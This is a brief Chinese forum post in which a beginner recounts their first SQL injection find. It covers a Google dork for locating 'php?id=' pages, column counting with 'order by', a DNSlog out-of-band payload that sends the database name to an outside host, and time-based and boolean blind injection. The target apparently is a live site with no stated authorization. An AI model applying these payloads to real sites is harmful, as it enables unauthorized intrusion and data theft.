纪念萌新挖到的第一个洞
0x01谷歌语法inurl:php?id=
刚开始逛了好久的社区,有好多大佬给出了挖洞指南,我就跟着学,挖到了自己的第一个洞洞
0x02SQL注入
看见网址上来一套行云流水,and、order by
发现有15个字段,之后尝试找显错位的时候遇到了问题
翻译成中文,以为自己把服务器打崩了。。。。但是select不会打崩服务器叭
尝试order by 网页正常,说明上面的语句不可以!!
偷偷摸摸的尝试了dns_log数据外带 and load_file(concat(‘//‘,(database()),’.tsxfjn.dnslog.cn/abc’)) 也不行!
这时候我想到了时间盲注!输入sleep,emmmm还是崩溃了
转换了一下思路,用了布尔盲注
发现可以使用布尔盲注,立马一套得到了完整的信息
| 用户名 | 金币 | 积分 | 时间 | 理由 |
|---|---|---|---|---|
| cc11 | 5.00 | 0 | 2021-09-23 22:10:55 | 一个受益终生的帖子~~ |
| 山屿云 | 5.00 | 0 | 2021-09-22 00:12:32 | 一个受益终生的帖子~~ |
| Track-手电筒 | 10.00 | 0 | 2021-09-18 14:02:26 | 活动额外奖赏 |
| Track-手电筒 | 20.00 | 0 | 2021-09-18 14:02:05 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
LoginCan Publish Content
返回:技术文章投稿区
实战纪实
山屿云
发表于 2021-9-20
加油
评论列表
加载数据中...